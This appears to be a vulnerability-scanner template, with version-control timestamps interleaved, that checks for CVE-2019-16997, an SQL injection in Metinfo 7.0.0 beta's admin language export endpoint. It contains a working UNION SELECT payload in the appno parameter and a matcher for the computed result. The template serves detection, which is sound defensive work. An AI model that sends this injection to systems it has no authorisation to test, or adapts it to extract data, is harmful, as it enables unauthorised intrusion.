2022-04-15 06:03:55 +00:00
id : CVE-2019-16997
info :
2022-04-15 10:38:30 +00:00
name : Metinfo 7.0.0 beta SQLI
2022-04-15 06:03:55 +00:00
author : ritikchaddha
severity : high
2022-04-15 10:46:24 +00:00
description : In Metinfo 7.0.0beta, a SQL Injection was discovered in app/system/language/admin/language_general.class.php via the admin/?n=language&c=language_general&a=doExportPack appno parameter.
2022-04-15 06:03:55 +00:00
reference :
- https://nvd.nist.gov/vuln/detail/CVE-2019-16997
2022-04-15 12:09:42 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 7.2
2022-04-15 12:09:42 +00:00
cve-id : CVE-2019-16997
cwe-id : CWE-89
2022-04-22 10:38:41 +00:00
tags : metinfo,sqli,cve,cve2019
2022-04-15 06:03:55 +00:00
requests :
- raw :
- |
POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2022-04-15 10:38:30 +00:00
appno= 1 union SELECT 98989*443131,1&editor=cn&site=web
2022-04-15 06:03:55 +00:00
redirects : true
max-redirects : 2
matchers-condition : and
matchers :
- type : word
part : body
words :
2022-04-15 10:38:30 +00:00
- "43865094559"
2022-04-15 06:03:55 +00:00
- type : status
status :
- 200